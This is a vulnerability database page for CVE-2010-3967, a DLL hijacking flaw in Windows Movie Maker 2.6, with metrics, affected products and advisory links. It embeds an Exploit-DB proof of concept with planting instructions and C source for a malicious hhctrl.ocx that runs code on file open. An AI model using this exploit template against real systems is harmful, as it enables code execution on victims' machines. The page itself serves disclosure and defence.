CVE-2010-3967 : Detail

CVE-2010-3967

47.11%V4
Network
2010-12-16
18h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability."

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 14731

Publication date : 2010-08-23 22h00 +00:00
Author : TheLeader
EDB Verified : No

/* Exploit Title: Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) Date: 24/08/2010 Author: TheLeader Email: gsog2009 [a7] hotmail [d0t] com Software Link: http://www.microsoft.com/downloads/details.aspx?FamilyID=d6ba5972-328e-4df7-8f9d-068fc0f80cfc&displaylang=en Version: 2.6.4038.0 and prior Tested on: Windows 7 x86 (6.1.7600) There is a way more interesting bug there in which the program tries to load a driver file. It's in investigation, but has a nice potential for a nastier vulnerability. Meanwhile, enjoy =] Instructions: 1. Create a file with the following extension: .mswmm 2. Compile this library and rename it to hhctrl.ocx 2. On the same directory of the .mswmm file, create a directory called: %SystemRoot% 3. Inside %SystemRoot%, create a directory called: System32 4. Move hhctrl.ocx into the System32 directory that you have just created 5. Open the .mswmm file and enjoy the fireworks =] *Whispers* to all the great guys at forums.hacking.org.il */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) int evil() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { evil(); return 0; }

Products Mentioned

Configuraton 0

Microsoft>>Windows_movie_maker >> Version 2.6

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

References

http://www.us-cert.gov/cas/techalerts/TA10-348A.html
Tags : third-party-advisory, x_refsource_CERT
http://secunia.com/advisories/42607
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1024875
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2010/3216
Tags : vdb-entry, x_refsource_VUPEN